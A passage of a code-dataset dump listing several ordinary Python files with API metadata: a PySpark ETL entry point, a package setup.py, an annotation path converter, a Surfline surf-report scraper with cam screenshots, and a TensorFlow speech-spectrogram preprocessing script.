"tensorflow.keras.layers", "line_number": 75, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 75, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 76, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 76, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 76, "usage_type": "name"}]}
+{"seq_id": "5365923917", "text": "\"\"\"This module is the entry-point for the run.py to handle spark session \\\nbuilding and ETL.\"\"\"\n\nimport contextlib\nfrom pyspark.sql import SparkSession\nfrom pathlib import Path\nfrom typing import Generator\n\nfrom src.jobs import extract, transform, load\nfrom src.jobs.utils.general import EnvEnum\nfrom src.jobs.utils.log_utils import Logger\n\n\ndef jobs_main(spark: SparkSession, logger: Logger, file_path: str) -> None:\n \"\"\"\n High-level function to perform the ETL job.\n\n Args:\n spark (SparkSession) : spark session to perform ETL job\n logger (Logger) : logger class instance\n file_path (str): path on which the job will be performed\n\n \"\"\"\n df = extract.extract_file(spark, file_path)\n logger.info(f\"{file_path} extracted to DataFrame\")\n\n count_df = transform.transform_df(df)\n logger.info(\"Counted words in the DataFrame\")\n\n load.write_to_path(count_df)\n logger.info(\"Written counted words to path\")\n\n\n@contextlib.contextmanager\ndef spark_build(env: EnvEnum) -> Generator[SparkSession, None, None]:\n \"\"\"\n Build the spark object.\n\n Args:\n env (EnvEnum): environment of the spark-application\n\n Yields:\n SparkSession object\n\n \"\"\"\n spark_builder = SparkSession.builder\n app_name = Path(__file__).parent.name\n\n if env == EnvEnum.dev:\n spark = spark_builder.appName(app_name).getOrCreate()\n else:\n raise NotImplementedError\n try:\n yield spark\n finally:\n spark.stop()\n", "repo_name": "datarootsio/skeleton-pyspark", "sub_path": "src/jobs/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1486, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 11, "dataset": "github-code", "pt": "32", "api": [{"api_name": "pyspark.sql.SparkSession", "line_number": 14, "usage_type": "name"}, {"api_name": "src.jobs.utils.log_utils.Logger", "line_number": 14, "usage_type": "name"}, {"api_name": "src.jobs.extract.extract_file", "line_number": 24, "usage_type": "call"}, {"api_name": "src.jobs.extract", "line_number": 24, "usage_type": "name"}, {"api_name": "src.jobs.transform.transform_df", "line_number": 27, "usage_type": "call"}, {"api_name": "src.jobs.transform", "line_number": 27, "usage_type": "name"}, {"api_name": "src.jobs.load.write_to_path", "line_number": 30, "usage_type": "call"}, {"api_name": "src.jobs.load", "line_number": 30, "usage_type": "name"}, {"api_name": "src.jobs.utils.general.EnvEnum", "line_number": 35, "usage_type": "name"}, {"api_name": "pyspark.sql.SparkSession.builder", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pyspark.sql.SparkSession", "line_number": 46, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 47, "usage_type": "call"}, {"api_name": "src.jobs.utils.general.EnvEnum.dev", "line_number": 49, "usage_type": "attribute"}, {"api_name": "src.jobs.utils.general.EnvEnum", "line_number": 49, "usage_type": "name"}, {"api_name": "contextlib.contextmanager", "line_number": 34, "usage_type": "attribute"}, {"api_name": "typing.Generator", "line_number": 35, "usage_type": "name"}, {"api_name": "pyspark.sql.SparkSession", "line_number": 35, "usage_type": "name"}]}
+{"seq_id": "21357556973", "text": "import os\nimport sys\nimport re\nimport setuptools\nfrom setuptools import find_packages\n\ndef get_version():\n \"\"\"\n Returns the package version declared in the __init__.py file\n \"\"\"\n VERSIONFILE = os.path.join('gis_packer', '__init__.py')\n initfile_lines = open(VERSIONFILE, 'rt').readlines()\n VSRE = r'^__version__ = [\\\"\\']*([\\d\\w.]+)[\\\"\\']'\n for line in initfile_lines:\n mo = re.search(VSRE, line, re.M)\n if mo:\n return mo.group(1)\n raise RuntimeError(f'Unable to find version string in {VERSIONFILE}')\n\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"gis_packer\",\n description=\"ETL tool for raster\",\n version=get_version(),\n author=\"Jean-Romain Roy\",\n author_email=\"jroy@gisaerobot.com\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/gis-Aerobot/gis-packer\",\n packages=find_packages(exclude=['tests']),\n include_package_data=True,\n zip_safe=True,\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: proprietary and confidential\",\n \"Operating System :: UNIX\",\n ],\n install_requires=[\n 'click',\n 'humanize',\n 'tqdm',\n 'psycopg2',\n 'sqlalchemy',\n 'numpy',\n 'matplotlib',\n 'pandas',\n 'shapely',\n 'boto3',\n 'geopandas',\n 'rasterio',\n 'toolz',\n 'dask',\n 'xarray'\n ],\n python_requires='>=3.6',\n)", "repo_name": "jeanromainroy/gis-packer", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1540, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "os.path.join", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "re.search", "line_number": 15, "usage_type": "call"}, {"api_name": "re.M", "line_number": 15, "usage_type": "attribute"}, {"api_name": "setuptools.setup", "line_number": 24, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 33, "usage_type": "call"}]}
+{"seq_id": "73406574172", "text": "import argparse\nimport cv2\nfrom pathlib import Path\nimport os\nimport random\nimport shutil\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('--annotation', default='./training_data', type=str,\n help='The folder path to videos.')\nparser.add_argument('--output', default='./annotation', type=str,\n help='The folder for the annotation files.')\n\ndef write_annotation(file_list, output_path):\n annotation_str = \"\\n\".join(map(lambda record: \" \".join(map(str, record)), file_list))\n\n with open(output_path, \"w+\", newline='') as flist_file:\n flist_file.write(annotation_str)\n\nif __name__ == '__main__':\n args = parser.parse_args()\n output_file = args.output\n annotation = args.annotation\n\n with open(annotation, 'r') as file:\n content = file.read()\n lines = content.splitlines()\n lines = [tuple(line.split()) for line in lines]\n\n lines = [(os.path.relpath(line[0],'.'),line[1],line[2],line[3]) for line in lines]\n\n write_annotation(file_list=lines,output_path=output_file)", "repo_name": "linkhack/Camera-Movement-Classification", "sub_path": "Develop/make_relative.py", "file_name": "make_relative.py", "file_ext": "py", "file_size_in_byte": 1070, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path.relpath", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}]}
+{"seq_id": "7454558282", "text": "class surfline_spot_scraper():\n \n def __init__(self, page_html, driver):\n self.page_html = page_html\n self.driver = driver\n \n def fetch(self, feature_name, content_idx=None):\n from bs4 import BeautifulSoup\n import re\n from datetime import datetime\n\n \"\"\"Returns surf spot's respective numerical data using BeautifulSoup scraping tools. Try/excepts statements \n are used in case page html changes. If page html changes then None value is returned and diagnostic message is\n printed. \n \n Keyword arguments:\n feaure_name -- feature value to be scraped type(str)\n content_idx -- optional integer value to pass if scraping command requires an idx\n \"\"\"\n\n if feature_name=='report update time':\n try:\n update_time = self.page_html.find('span', class_='quiver-forecaster-profile__update-container__last-update').contents[3]\n except AttributeError:\n print('Update html: ', feature_name)\n return None\n else:\n return datetime.strptime(re.findall(r'\\d+:\\d+[pa]m', update_time)[0], '%I:%M%p')\n\n elif feature_name=='condition':\n try:\n return self.page_html.find('div', class_='quiver-spot-report').contents[0].text\n except AttributeError:\n print('Update html: ', feature_name)\n return None\n\n elif feature_name=='surf height':\n try:\n raw_surf_height = self.page_html.find('div', 'quiver-spot-forecast-summary__stat-container quiver-spot-forecast-summary__stat-container--surf-height').find(class_='quiver-surf-height').contents[0]\n except AttributeError:\n try:\n flat_surf = self.page_html.find('div', class_='quiver-spot-forecast-summary__stat-container quiver-spot-forecast-summary__stat-container--surf-height quiver-spot-forecast-summary__stat-container--surf-height--expired').find('span', class_='quiver-surf-height quiver-surf-height--flat').text\n except AttributeError:\n try:\n expired_surf_height = self.page_html.find('div', class_='quiver-spot-forecast-summary__stat-container quiver-spot-forecast-summary__stat-container--surf-height quiver-spot-forecast-summary__stat-container--surf-height--expired').find(class_='quiver-surf-height').text\n except AttributeError:\n print('Update html: ', feature_name)\n return None\n else:\n return 'expired'\n else:\n return 0.0\n else:\n if raw_surf_height == 'Flat':\n return 0.0\n else:\n surf_height_range = list(map(float, re.findall(r'\\d+', raw_surf_height)))\n return sum(surf_height_range) / len(surf_height_range)\n\n elif feature_name=='swell':\n try:\n raw_ft = self.page_html.find_all('span', class_='quiver-swell-measurements__units')[content_idx].previous_element\n raw_secs = self.page_html.find_all('span', class_='quiver-swell-measurements__units')[content_idx].next_element.next_element\n raw_degrees = self.page_html.find_all('span', class_='quiver-swell-measurements__direction')[content_idx].text\n except AttributeError:\n swell_ft = None\n swell_secs = None\n swell_degrees = None\n print('Update html: ', feature_name)\n except IndexError:\n swell_ft = 0\n swell_secs = 0\n swell_degrees = 0\n else:\n swell_ft = float(re.findall(r'\\d+\\.\\d+|\\d+', raw_ft)[0])\n swell_secs = int(re.findall(r'\\d+', raw_secs)[0])\n swell_degrees = int(re.findall(r'\\d+', raw_degrees)[0])\n return swell_ft, swell_secs, swell_degrees\n\n elif feature_name=='current tide':\n try:\n tide = self.page_html.find('span', class_='quiver-reading').text\n except (AttributeError, IndexError):\n print('Update html: ', feature_name)\n return None\n else:\n return float(re.findall(r'\\d+\\.\\d+|\\d+', tide)[0])\n\n elif feature_name=='local extrema tide':\n try:\n local_extrema_tide = self.page_html.find_all('span', class_='quiver-reading-description')[1].text\n except (AttributeError,IndexError) as e:\n local_extrema_tide_ft = None\n local_extrema_tide_time = None\n print('Update html for: {} ... Error: {}', feature_name, e)\n else:\n local_extrema_tide_ft = float(re.findall(r'-?\\d+\\.\\d+(?=\\s?ft)|-?\\d+(?=\\s?ft)', local_extrema_tide)[0])\n local_extrema_tide_time = datetime.strptime(re.findall(r'\\d+:\\d+[pa]m', local_extrema_tide)[0], '%I:%M%p')\n return local_extrema_tide_ft, local_extrema_tide_time\n \n elif feature_name=='wind mph':\n try:\n raw_wind_mph = self.page_html.find_all('span', class_='quiver-reading')[1].text\n except (AttributeError, IndexError):\n print('Update html: ', feature_name)\n return None\n else:\n return float(re.findall(r'\\d+', raw_wind_mph)[0])\n \n elif feature_name=='wind degrees':\n try:\n raw_wind_degrees = self.page_html.find_all('span', class_='quiver-reading-description')[2].text\n except (AttributeError, IndexError):\n print('Update html: ', feature_name)\n return None\n else:\n return float(re.findall(r'\\d+', raw_wind_degrees)[0])\n\n elif feature_name=='air temperature':\n try:\n air_temp = self.page_html.find('div', class_='quiver-weather-stats').find('div').contents[1]\n except (AttributeError, IndexError):\n print('Update html: ', feature_name)\n return None\n else:\n return float(air_temp)\n \n elif feature_name=='ocean temperature':\n try:\n water_temp_range = self.page_html.find('div', class_='quiver-water-temp').find('div')\n except AttributeError:\n print('Update html: ', feature_name)\n return None\n else:\n return (float(water_temp_range.contents[1]) + int(water_temp_range.contents[5])) / 2\n\n elif feature_name=='daylight':\n try:\n daylight = self.page_html.find('table', class_='quiver-forecast-graphs__table quiver-forecast-graphs__table--sunlight-times').find_all('td')\n except AttributeError:\n first_light = 'update html'\n sunrise = 'update html'\n sunset = 'update html'\n last_light = 'update html'\n else:\n first_light = datetime.strptime(daylight[1].text, '%I:%M%p')\n sunrise = datetime.strptime(daylight[3].text, '%I:%M%p')\n sunset = datetime.strptime(daylight[5].text, '%I:%M%p')\n last_light = datetime.strptime(daylight[7].text, '%I:%M%p')\n return first_light, sunrise, sunset, last_light\n\n elif feature_name=='description':\n try:\n description = self.page_html.find('div', class_='quiver-spot-report__report-text').find_all('p')[:-1]\n except AttributeError:\n print('Update html: ', feature_name)\n return None\n else:\n return ''.join(p.get_text() for p in description).replace('\\n', '').replace('\\xa0', '')\n else:\n return 'feature_name options: '\n\n def spot_dict(self, surf_spot):\n from datetime import datetime\n import time\n import os\n import csv\n\n \"\"\"Returns surf spot dictionary\"\"\"\n\n swell_one_ft, swell_one_secs, swell_one_degrees = self.fetch('swell', content_idx=0)\n swell_two_ft, swell_two_secs, swell_two_degrees = self.fetch('swell', content_idx=3)\n swell_three_ft, swell_three_secs, swell_three_degrees = self.fetch('swell', content_idx=2)\n \n local_extrema_tide_ft, local_extrema_tide_time = self.fetch('local extrema tide')\n\n first_light, sunrise, sunset, last_light = self.fetch('daylight')\n \n spot_dict = {\n 'scraped_time': datetime.now(),\n 'report_update_time': self.fetch('report update time'),\n 'condition': self.fetch('condition'),\n 'surf_height': self.fetch('surf height'),\n 'swell_one_ft': swell_one_ft,\n 'swell_one_secs': swell_one_secs,\n 'swell_one_degrees': swell_one_degrees,\n 'swell_two_ft': swell_two_ft,\n 'swell_two_secs': swell_two_secs,\n 'swell_two_degrees': swell_two_degrees,\n 'swell_three_ft': swell_three_ft,\n 'swell_three_secs': swell_three_secs,\n 'swell_three_degrees': swell_three_degrees,\n 'current_tide': self.fetch('current tide'),\n 'local_extrema_tide_ft': local_extrema_tide_ft,\n 'local_extrema_tide_time': local_extrema_tide_time,\n 'wind_mph': self.fetch('wind mph'),\n 'wind_degrees': self.fetch('wind degrees'),\n 'air_temp_f': self.fetch('air temperature'),\n 'ocean_temp_f': self.fetch('ocean temperature'),\n 'first_light': first_light,\n 'sunrise': sunrise,\n 'sunset': sunset,\n 'last_light': last_light,\n 'description': self.fetch('description')\n }\n \n #filename for csv file\n spot_dir = 'data/'+surf_spot+'.csv'\n\n #append dictionary to respective spot csv file\n if os.path.isfile(spot_dir):\n with open(spot_dir, 'a') as f:\n w = csv.DictWriter(f, spot_dict.keys())\n w.writerow(spot_dict)\n else:\n #init csv file with column header\n with open(spot_dir, 'w') as f:\n w = csv.DictWriter(f, spot_dict.keys())\n w.writeheader()\n w.writerow(spot_dict)\n\n def cam_screenshot(self, surf_spot):\n from selenium import webdriver\n import time\n from datetime import datetime\n from bs4 import BeautifulSoup\n import sys\n \n #init cursor location on chart header above surf cam video\n element = self.driver.find_elements_by_xpath('//div[@class=\"sl-forecast-header__nav__page-level__link__text\"]')[2]\n action = webdriver.common.action_chains.ActionChains(self.driver)\n\n #move cursor to surf cam block\n action.move_to_element_with_offset(element, 5, 200)\n\n #start surf cam video\n action.click()\n action.perform()\n print('\\tStarting Ad #1')\n #play/pause/stop button on the botton right corner of surf cam\n try:\n ad_button = self.page_html.find('div', class_=\"jw-icon jw-icon-inline jw-button-color jw-reset jw-icon-playback\")['aria-label']\n except TypeError:\n self.driver.quit()\n sys.exit('Update ad button html')\n\n #Check for when the advertisement stops\n while ad_button != 'Stop':\n time.sleep(10)\n ad_button = BeautifulSoup(self.driver.page_source, 'html.parser').find('div', class_=\"jw-icon jw-icon-inline jw-button-color jw-reset jw-icon-playback\")['aria-label']\n \n print('\\tFullscreen surf cam')\n #full screen the surf cam\n action.double_click()\n action.perform()\n \n #get datetime used for labeling screenshot filename\n screenshot_datetime = datetime.now()\n print('\\tScreenshot Captured')\n\n #save surf cam screen shot to respective surf spot screenshot dir\n self.driver.save_screenshot('screenshots/{}/{}{}{}_{}_{}.png'.format(surf_spot, screenshot_datetime.year, screenshot_datetime.month, \n screenshot_datetime.day, screenshot_datetime.hour, \n screenshot_datetime.minute))\n\n # #reinitiate ad button variable\n # ad_button = BeautifulSoup(self.driver.page_source, 'html.parser').find('div', class_=\"jw-icon jw-icon-inline jw-button-color jw-reset jw-icon-playback\")['aria-label']\n \n # #Check for when the advertisement #2 stops\n # print('\\tChecking for Ad #2')\n # while ad_button != 'Stop':\n # time.sleep(10)\n # ad_button = BeautifulSoup(self.driver.page_source, 'html.parser').find('div', class_=\"jw-icon jw-icon-inline jw-button-color jw-reset jw-icon-playback\")['aria-label']\n # time.sleep(4)\n \n # #get datetime used for labeling screenshot filename\n # screenshot_datetime = datetime.now()\n # print('\\tScreenshot Captured')\n\n # #save surf cam screen shot to respective surf spot screenshot dir\n # self.driver.save_screenshot('screenshots/{}/{}{}{}_{}_{}.png'.format(surf_spot, screenshot_datetime.year, screenshot_datetime.month, \n # screenshot_datetime.day, screenshot_datetime.hour, \n # screenshot_datetime.minute))\n", "repo_name": "marshall7m/surfline_scraper", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 13588, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "datetime.datetime.strptime", "line_number": 28, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 28, "usage_type": "name"}, {"api_name": "re.findall", "line_number": 28, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 57, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 75, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 76, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 77, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 87, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 97, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 98, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 98, "usage_type": "name"}, {"api_name": "re.findall", "line_number": 98, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 108, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 117, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 146, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 146, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 147, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 147, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 148, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 148, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 149, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 149, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 180, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 180, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 211, "usage_type": "call"}, {"api_name": "os.path", "line_number": 211, "usage_type": "attribute"}, {"api_name": "csv.DictWriter", "line_number": 213, "usage_type": "call"}, {"api_name": "csv.DictWriter", "line_number": 218, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.action_chains.ActionChains", "line_number": 231, "usage_type": "call"}, {"api_name": "selenium.webdriver.common", "line_number": 231, "usage_type": "attribute"}, {"api_name": "selenium.webdriver", "line_number": 231, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 245, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 249, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 250, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 258, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 258, "usage_type": "name"}]}
+{"seq_id": "19665256362", "text": "import tensorflow as tf\nimport os\nimport argparse\nimport multiprocessing as mp\n\n_SAMPLE_RATE = 16000\n\n\ndef read_audio(fname):\n audio_binary = tf.read_file(fname)\n waveform = tf.contrib.ffmpeg.decode_audio(\n audio_binary,\n file_format='wav',\n samples_per_second=_SAMPLE_RATE,\n channel_count=1)[:, 0]\n num_samples = tf.shape(waveform)[0]\n pad_front = (_SAMPLE_RATE - num_samples) // 2\n pad_back = (_SAMPLE_RATE - num_samples) - pad_front\n waveform = tf.pad(waveform, [[pad_front, pad_back]])\n return waveform, fname\n\n\ndef make_spectrogram(dataset):\n frame_length = FLAGS.frame_length * _SAMPLE_RATE // 1e3\n frame_step = FLAGS.frame_step * _SAMPLE_RATE // 1e3\n stfts = tf.contrib.signal.stft(\n dataset,\n frame_length=tf.cast(frame_length, tf.int32),\n frame_step=tf.cast(frame_step, tf.int32),\n fft_length=tf.cast(frame_length, tf.int32))\n magnitude_spectrograms = tf.abs(stfts)\n log_offset = 1e-6\n log_magnitude_spectrograms = tf.log(magnitude_spectrograms + log_offset)\n return tf.cast(log_magnitude_spectrograms, tf.float32)\n\n\ndef _bytes_feature(value):\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n\n\ndef _float_feature(array):\n if array.ndim > 1:\n array = array.ravel()\n return tf.train.Feature(float_list=tf.train.FloatList(value=array))\n\n\ndef main():\n test_words = [\"yes\", \"no\", \"up\", \"down\", \"left\", \"right\", \"on\", \"off\", \"stop\", \"go\"]\n aux_words = [\"bed\", \"bird\", \"cat\", \"dog\", \"happy\", \"house\", \"marvin\", \"sheila\", \"tree\", \"wow\"]\n full_word_list = os.listdir(os.path.join(FLAGS.dataset_path, 'train', 'audio'))\n del full_word_list[full_word_list.index('_background_noise_')]\n\n # our order will go:\n # 1. the 10 words to classify on the test set: test_words\n # 2. words that aren't one of the test set words but have a \"regular\" class representation\n # 3. words that aren't in the test set and are underrepresented in the training set: aux words\n # this will let us to more easily clip labels and train on reduced sets of labels\n words = [word for word in test_words]\n words += [word for word in full_word_list if word not in (aux_words + test_words)]\n words += aux_words\n\n with open('{}/train/validation_list.txt'.format(FLAGS.dataset_path), 'r') as f:\n validation_files = f.read().split(\"\\n\")[:-1]\n validation_files = ['{}/train/audio/{}'.format(FLAGS.dataset_path, i) for i in validation_files]\n\n with open('{}/train/testing_list.txt'.format(FLAGS.dataset_path), 'r') as f:\n pseudo_test_files = f.read().split(\"\\n\")[:-1]\n pseudo_test_files = ['{}/train/audio/{}'.format(FLAGS.dataset_path, i) for i in pseudo_test_files]\n\n train_files = []\n for word in words:\n for fname in os.listdir('{}/train/audio/{}'.format(FLAGS.dataset_path, word)):\n filename = '{}/train/audio/{}/{}'.format(FLAGS.dataset_path, word, fname)\n if filename not in validation_files and filename not in pseudo_test_files:\n train_files.append(filename)\n\n # test_files = os.listdir('{}/test/audio'.format(FLAGS.dataset_path))\n\n dataset_files = {\n 'train': train_files,\n 'valid': validation_files,\n 'ptest': pseudo_test_files,\n # 'test': test_files\n }[FLAGS.subset]\n\n\n # build a *SYMBOLIC* representation of our dataset\n # read audio files, batch them, build spectrograms\n dataset = tf.data.Dataset.from_tensor_slices(dataset_files)\n dataset = dataset.apply(\n tf.data.experimental.map_and_batch(\n map_func=read_audio,\n batch_size=FLAGS.batch_size,\n num_parallel_calls=mp.cpu_count())\n )\n dataset = dataset.prefetch(None)\n iterator = dataset.make_initializable_iterator()\n audio, labels = iterator.get_next()\n spectrograms = make_spectrogram(audio)\n\n # now we'll actually iterate through build the spectrograms\n # then save them out to a TFRecord file\n # if we're doing the training set, we'll also save the pixel-wise mean\n # and variance across all spectrograms and save them out as numpy matrices\n filename = '{}/{}.tfrecords'.format(FLAGS.dataset_path, FLAGS.subset)\n writer = tf.python_io.TFRecordWriter(filename)\n\n sess = tf.Session()\n sess.run(iterator.initializer)\n\n print(\"Building tfrecord file {}\".format(filename))\n progbar = tf.keras.utils.Progbar(len(dataset_files))\n first = True\n while True:\n try:\n # get a batch\n specs, labs = sess.run([spectrograms, labels])\n\n # if training set, update our tally of pixel wise stats\n if first and FLAGS.subset == 'train':\n mean, var = specs.sum(axis=0), (specs**2).sum(axis=0)\n first = False\n elif FLAGS.subset == 'train':\n mean += specs.sum(axis=0)\n var += (specs**2).sum(axis=0)\n\n # now loop through each spectrogram and label and add them to TFRecord\n # as an \"example\" containing named \"features\"\n for spectrogram, label in zip(specs, labs):\n feature = {\n 'spec': _float_feature(spectrogram),\n 'label': _bytes_feature(b\"/\".join(label.split(b\"/\")[-2:]))\n }\n example = tf.train.Example(features=tf.train.Features(feature=feature))\n writer.write(example.SerializeToString())\n progbar.add(len(specs))\n # dataset has been exhausted, we're done\n except tf.errors.OutOfRangeError:\n break\n writer.close()\n\n if FLAGS.subset == 'train':\n # average out our stats, use $\\sigma$ = E[x**2] - E**2[x]\n mean /= len(dataset_files)\n var /= len(dataset_files)\n var -= mean**2\n\n writer = tf.python_io.TFRecordWriter('{}/stats.tfrecords'.format(FLAGS.dataset_path))\n features = {\n 'mean': _float_feature(mean),\n 'var': _float_feature(var)\n }\n example = tf.train.Example(features=tf.train.Features(feature=features))\n writer.write(example.SerializeToString())\n writer.close()\n\n with open(os.path.join(FLAGS.dataset_path, 'labels.txt'), 'w') as f:\n f.write(','.join(words))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--dataset_path',\n type=str,\n default='/data',\n help='path to data')\n\n parser.add_argument(\n '--batch_size',\n type=int,\n default=128,\n help='number of samples to process at once')\n \n parser.add_argument(\n '--log_every',\n type=int,\n default=50,\n help='batches between print logging')\n\n parser.add_argument(\n '--frame_length',\n type=int,\n default=20,\n help=\"length of spectrogram FFT in ms\")\n\n parser.add_argument(\n '--frame_step',\n type=int,\n default=10,\n help=\"time between FFT windows in ms\")\n\n parser.add_argument(\n '--subset',\n type=str,\n help='what subset to preprocess')\n\n FLAGS = parser.parse_args()\n main()\n", "repo_name": "alecgunny/tf-speech-recognition", "sub_path": "preproc/preproc.py", "file_name": "preproc.py", "file_ext": "py", "file_size_in_byte": 6618, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "tensorflow.read_file", "line_number": 10, "usage_type": "call"}, {"api_name": "tensorflow.contrib.ffmpeg.decode_audio", "line_number": 11, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 11, "usage_type": "attribute"}, {"api_name": "tensorflow.shape", "line_number": 16, "usage_type": "call"}, {"api_name": "tensorflow.pad", "line_number": 19, "usage_type": "call"}, {"api_name": "tensorflow.contrib.signal.stft", "line_number": 26, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 26, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 28, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 28, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 29, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 29, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 30, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 30, "usage_type": "attribute"}, {"api_name": "tensorflow.abs", "line_number": 31, "usage_type": "call"}, {"api_name": "tensorflow.log", "line_number": 33, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 34, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 34, "usage_type": "attribute"}, {"api_name": "tensorflow.train.Feature", "line_number": 38, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 38, "usage_type": "attribute"}, {"api_name": "tensorflow.train.BytesList", "line_number": 38, "usage_type": "call"}, {"api_name": "tensorflow.train.Feature", "line_number": 44, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 44, "usage_type": "attribute"}, {"api_name": "tensorflow.train.FloatList", "line_number": 44, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 72, "usage_type": "call"}, {"api_name": "tensorflow.data.Dataset.from_tensor_slices", "line_number": 89, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 89, "usage_type": "attribute"}, {"api_name": "tensorflow.data.experimental.map_and_batch", "line_number": 91, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 91, "usage_type": "attribute"}, {"api_name": "multiprocessing.cpu_count", "line_number": 94, "usage_type": "call"}, {"api_name": "tensorflow.python_io.TFRecordWriter", "line_number": 106, "usage_type": "call"}, {"api_name": "tensorflow.python_io", "line_number": 106, "usage_type": "attribute"}, {"api_name": "tensorflow.Session", "line_number": 108, "usage_type": "call"}, {"api_name": "tensorflow.keras.utils.Progbar", "line_number": 112, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 112, "usage_type": "attribute"}, {"api_name": "tensorflow.train.Example", "line_number": 134, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 134, "usage_type": "attribute"}, {"api_name": "tensorflow.train.Features", "line_number": 134, "usage_type": "call"}, {"api_name": "tensorflow.errors", "line_number": 138, "usage_type": "attribute"}, {"api_name": "tensorflow.python_io.TFRecordWriter", "line_number": 148, "usage_type": "call"}, {"api_name": "tensorflow.python_io", "line_number": 148, "usage_type": "attribute"}, {"api_name": "tensorflow.train.Example", "line_number": 153, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 153, "usage_type": "attribute"}, {"api_name": "tensorflow.train.Features", "line_number": 153, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path", "line_number": 157, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 162, "usage_type": "call"}]}
